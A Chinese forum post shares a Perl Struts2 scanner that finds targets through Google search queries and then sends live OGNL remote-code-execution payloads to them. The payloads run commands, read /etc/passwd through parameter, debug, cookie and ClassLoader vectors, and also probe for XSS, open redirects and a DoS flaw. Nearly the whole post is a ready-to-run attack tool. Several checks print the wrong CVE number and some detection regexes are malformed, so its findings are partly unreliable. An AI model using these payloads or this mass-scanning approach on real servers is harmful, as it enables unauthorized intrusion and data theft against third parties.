返回列表 发帖

Struts2检测脚本--多版本

版本最齐全的检测脚本,保存为xx.pl
  1. # !/url/bin/perl -w
  2. # Name  : StrutScan.pl V2.0
  3. # Author: riusksk
  4. # Blog  : http://riusksk.blogbus.com
  5. # Date  : 2014-04-23

  6. no  warnings;
  7. use strict;
  8. use LWP::UserAgent;
  9. use HTTP::Cookies;
  10. use Encode;
  11. use URI::Escape;
  12. use Getopt::Long;

  13. my ($keyword, $page, $url, $cmd, $help);
  14. my @result = ();
  15. my $entireurl = "";

  16. GetOptions(
  17.     'g=s' => \$keyword,
  18.     'p=s' => \$page,
  19.     'u=s' => \$url,
  20.     'c=s' => \$cmd,
  21.     'h!' => \$help,
  22. );

  23. if(!defined $keyword && !defined $url || defined $help){
  24.     &usage();
  25. }

  26. if(defined $keyword) {
  27.     my @urls = &google();
  28.     foreach my $url(@urls){
  29.         chomp($url);
  30.         if($url){
  31.             &audit($url);
  32.         }
  33.     }
  34. }


  35. if(defined $url){
  36.     &audit($url);
  37. }

  38. if(@result){
  39.     print("\n[*] 共发现".@result."个漏洞:\n\n");
  40.     print "@result\n";
  41. }
  42. else{print "\n[*] 未发现漏洞!\n\n"};

  43. sub usage(){
  44.     print "\n";
  45.     print "Usage:   perl\t StructScan.pl \n";
  46.     print "\t -g\t Google 搜索语句 \n";
  47.     print "\t -p\t 搜索结果的起始页数,默认从第1页开始\n";
  48.     #print "\t -c\t 执行的命令\n";
  49.     print "\t -u\t 指定网址\n";
  50.     print "\t -h\t 帮助信息\n\n";
  51.     print "Example: perl StructScan.pl -g \"site:qq.com filetype:action\" -p 1\n\n";
  52.     exit;
  53. }

  54. sub google{
  55.    
  56.     my @urls = ();
  57.     my @actionurls = ();
  58.     my $url = "";
  59.     if ($page < 1){
  60.         $page = 1;
  61.     }
  62.     my $start = 100 * ($page-1);
  63.    
  64.     # 通过google搜索action 文件
  65.         my $ua = new LWP::UserAgent;
  66.     $ua->agent("Mozilla/5.0 (X11; Linux i686; rv:2.0.0) Gecko/20130130");
  67.     $ua->max_redirect( 0 );
  68.     my $response = $ua->get( "http://www.google.com.au/search?hl=zh-CN&q=".$keyword."&num=100&start=".$start )
  69.         or die ("[*] google请求失败,请重试!\n");
  70.     #print $response->content."\n";
  71.     my $content = $response->content;
  72.    
  73.     if($content=~/找不到和您的查询/g){
  74.             die("[*] 搜索不到相关信息!\n\n");
  75.     }
  76.     # 提取搜索结果中的文件链接
  77.     my @urls = $content =~ /<cite>(.*?)<\/cite>/ig;

  78.     foreach my $url(@urls){
  79.         
  80.         chomp($url);
  81.         $entireurl = $url;        # 保存完整的action\do\xhtml文件链接,包括其参数
  82.         # print"完整链接:$entireurl\n";
  83.         $url =~ /(.+?\.(action|do|xhtml))/i;
  84.         $url = $1;
  85.         $url = "http://".$url;
  86.         #print "链接:$url\n";
  87.         push(@actionurls,$url);
  88.     }
  89.     # print @actionurls;
  90.     my %seen = ();
  91.     @actionurls = grep(!$seen{$_}++ , @actionurls);  # 删除重复的文件地址
  92.     return @actionurls;
  93.     #print @urls;

  94. }


  95. sub audit(){
  96.        
  97.         my $url = $_[0];
  98.         print "\n[*]检测链接:$url\n";

  99. =pod
  100.         if(defined $cmd){
  101.                 $temp = $cmd;
  102.                 $cmd = uri_escape($cmd);
  103.                 $cmd =~ s/\%20/+/g;
  104.         }
  105.         else{
  106.                 $cmd = "help";
  107.         }

  108.         print "命令:$cmd\n";
  109. =cut

  110.         my $ua = new LWP::UserAgent;
  111.     $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)");
  112.     $ua->max_redirect( 0 );


  113.     print "[*]检测 CVE-2010-1870 Struts2/XWork < 2.2.0 远程代码执行漏洞\n";
  114.     my $payload1 = '?(\'\43_memberAccess.allowStaticMethodAccess\')(a)=true&(b)((\'\43context[\\\'xwork.MethodAccessor.denyMethodExecution\\\']\75false\')(b))&(\'\43c\')((\'\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET\')(c))&(g)((\'\43req\75@org.apache.struts2.ServletActionContext@getRequest()\')(d))&(h)((\'\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))\')(d))&(i)((\'\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())\')(d))&(i01)((\'\43webStr\75new\40byte[51020]\')(d))&(i1)((\'\43webRootzproreader.readFully(\43webStr)\')(d))&(i111)((\'\43webStr12\75new\40java.lang.String(\43webStr)\')(d))&(i2)((\'\43xman\75@org.apache.struts2.ServletActionContext@getResponse()\')(d))&(i2)((\'\43xman\75@org.apache.struts2.ServletActionContext@getResponse()\')(d))&(i95)((\'\43xman.getWriter().println(\43webStr12)\')(d))&(i99)((\'\43xman.getWriter().close()\')(d))&cmd=help';
  115.     # print"攻击代码:$payload1\n";
  116.     my $response1 = $ua->get( "$url$payload1")
  117.         or die ("[*] 请求失败,请重试!\n");
  118.     # print $response1->content."\n";
  119.     my $content1 = $response1->content;
  120.     if( ($content1=~/BOOTCFG/ig) || ($content1=~/help\ name/ig) ){
  121.             print "[*]存在 CVE-2010-1870 漏洞!\n";
  122.                 push(@result, $url.$payload1."\n\n");
  123.     }

  124.     # 需要检测参数名来注入恶意代码
  125.     print"[*]检测 CVE-2012-0391 Apache Struts2 <= 2.2.1.1 ExceptionDelegator 远程代码执行漏洞\n";
  126.     my $payload2 = "?id='%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,\@org.apache.commons.io.FileUtils\@readFileToString(new%20java.io.File(%22/etc/passwd%22))%2b'";
  127.     my $response2 = $ua->get( "$url$payload2")
  128.         or die ("[*] 请求失败,请重试!\n");
  129.     my $content2 = $response2->content;
  130.     if( ($content2=~/root/ig) && ($content2=~/\/bash\/bash/ig) ){
  131.             print "[*] 存在 CVE-2012-0394  漏洞!\n";
  132.                 push(@result, $url.$payload2."\n\n");
  133.     }

  134.     print"[*]检测 CVE-2012-0394 Apache Struts2 <= 2.3.1 DebuggingInterceptor 远程代码执行漏洞\n";
  135.     my $payload3 = "?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,\@org.apache.commons.io.FileUtils\@readFileToString(new%20java.io.File(%22/etc/passwd%22))";
  136.     my $response3 = $ua->get( "$url$payload3")
  137.         or die ("[*] 请求失败,请重试!\n");
  138.     my $content3 = $response3->content;
  139.     if( ($content3=~/root/ig) && ($content3=~/\/bin\/bash/ig) ){
  140.             print "[*] 存在 CVE-2012-0394 漏洞!\n";
  141.                 push(@result, $url.$payload3."\n\n");
  142.     }


  143.     print"[*]检测 CVE-2012-0392 Apache Struts2 <= 2.2.1.1 CookieInterceptor 远程代码执行漏洞\n";
  144.     my $cookie = HTTP::Cookies->new;
  145.     $cookie->clear;
  146.     $cookie->set_cookie("(#_memberAccess[\"allowStaticMethodAccess\"]\u003dtrue)(x)=1; x[\@org.apache.commons.io.FileUtils\@readFileToString(new%20java.io.File(%22/etc/passwd%22)]=1");
  147.     $ua->cookie_jar($cookie);
  148.     my $response4 = $ua->get( "$url")
  149.         or die ("[*] 请求失败,请重试!\n");
  150.     my $content4 = $response4->content;
  151.     if( ($content4=~/root/ig) && ($content4=~/\/bin\bash/ig) ){
  152.             print "[*] 存在 CVE-2012-0394  漏洞!\n";
  153.                 push(@result, $url."\n".$cookie."\n\n");
  154.     }

  155.     print"[*]检测 Struts 2.0.0 - 2.0.11 XSS 漏洞\n";
  156.     my $xss = "?<script>alert(1)</script>test=hello";
  157.     $xss = uri_escape($xss);
  158.     my $response5 = $ua->get( "$url$xss")
  159.         or die ("[*] 请求失败,请重试!\n");
  160.     my $content5 = $response5->content;
  161.     if( $content5=~/\<script\>alert\(1\)\<\/script\>/ig ){
  162.             print "[*] 存在 XSS 漏洞!\n";
  163.                 push(@result, $url.$xss."\n\n");
  164.     }
  165.    
  166.     print"[*]检测 CVE-2011-1772 Struts 2.0.0 - 2.2.1.1 XWork XSS 漏洞\n";
  167.     my $xss1 = "!login:cantLogin<script>alert(1)</script>=some_value";
  168.     $xss1 = uri_escape($xss1);
  169.     my $response6 = $ua->get("$url$xss1")
  170.             or die ("[*] 请求失败,请重试!\n");
  171.     my $content6 = $response6->content;
  172.     if($content6=~/\<script\>alert\(1\)\<\/script\>/ig){
  173.              print "[*] 存在 XSS 漏洞!\n";
  174.                 push(@result, $url.$xss1."\n\n");          
  175.     }

  176.     print"[*]检测 CVE-2011-3923 Apache Struts2 ParametersInterceptor 远程代码执行漏洞\n";
  177.     my $payload7 = "?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20\@java.lang.Runtime\@getRuntime%28%29.exec%28%27help%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true";
  178.     my $response7 = $ua->get( "$url$payload7")
  179.         or die ("[*] 请求失败,请重试!\n");
  180.     my $content7 = $response7->content;
  181.     if( ($content7=~/BOOTCFG/ig) || ($content7=~/help\ name/ig) ){
  182.             print "[*] 存在 CVE-2012-0394 漏洞!\n";
  183.                 push(@result, $url.$payload7."\n\n");
  184.     }

  185. =pod
  186.     print"[*]检测 Struct2 Java 浮点DoS漏洞\n";
  187.     my $payload8 = "?(new java.lang.Double(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022250738585072012))";
  188.     my $response8 = $ua->get( "$url$payload8")
  189.         or die ("[*] 请求失败,请重试!\n");
  190.     #sleep(5);
  191.     my @tmp = split('//',$url);
  192.     my @site = split('/',$tmp[1]);
  193.     my $site = $site[0];
  194.     #print"站点:$site\n";
  195.     my @ping = readpipe("ping -c 5 $site");
  196.     #print @ping;
  197.     foreach my $ping(@ping){
  198.             if($ping=~/timeout/ig){
  199.                     print"[*] 存在 Java 浮点DoS漏洞\n";
  200.                     push(@result, $url.$payload8."\n");
  201.                     return;
  202.             }
  203.     }
  204. =cut

  205.     print"[*]检测 CVE-2013-2251 Apache Struts2 redirect 远程代码执行漏洞\n";
  206.     my $payload9 = "?redirect:\$\{%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(\"netstat\"),%23xx%3dnew%20java.lang.String(\"-an\"),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23mbqdpz%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23mbqdpz.println(%23d),%23mbqdpz.close()\}";
  207.     my $response9 = $ua->get("$url$payload9")
  208.             or die ("[*] 请求失败,请重试!\n");
  209.     my $content9 = $response9->content;
  210.     if( ($content9=~/Active\ Internet\ connections/ig) && ($content9=~/tcp/ig) ){
  211.             print "[*] 存在 CVE-2013-2251 漏洞!\n";
  212.             push(@result, $url.$payload9."\n\n");
  213.     }

  214.     print"[*]检测 CVE-2013-2248 Apache Struts2 redirect/redirectAction 重定向漏洞\n";
  215.     my $payload10 = "?redirect:http://www.baidu.com/";
  216.     my $response10 = $ua->get("$url$payload10")
  217.         or die ("[*] 请求失败,请重试!\n");
  218.     my $content10 = $response10->content;
  219.     if( $content10=~/百度一下\,你就知道/ig ){
  220.         print "[*] 存在 CVE-2013-2248 漏洞!\n";
  221.         push(@result, $url.$payload10."\n\n");
  222.     }

  223.     print"[*]检测 CVE-2014-0094 Apache Struts2 ClassLoader Manipulation 远程代码执行漏洞\n";
  224.     my $payload11 = "?Class[%27classLoader%27][%27resources%27].dirContext.docBase=/";
  225.     my $response11 = $ua->get("$url$payload11")
  226.         or die ("[*] 请求失败,请重试!\n");
  227.     my $loc = rindex($url,'/');
  228.     my $newurl = substr($url,0,$loc);
  229.     my $payload11_2 = "etc/passwd";
  230.     $response11 = $ua->get("$newurl$payload11_2")
  231.         or die ("[*] 请求失败,请重试!\n");
  232.     my $content11 = $response11->content;
  233.     if( $content11=~/root\:\/bin/ig ){
  234.         print "[*] 存在 CVE-2014-0094 漏洞!\n";
  235.         push(@result, $url.$payload11_2."\n\n");
  236.     }
  237. }
复制代码

返回列表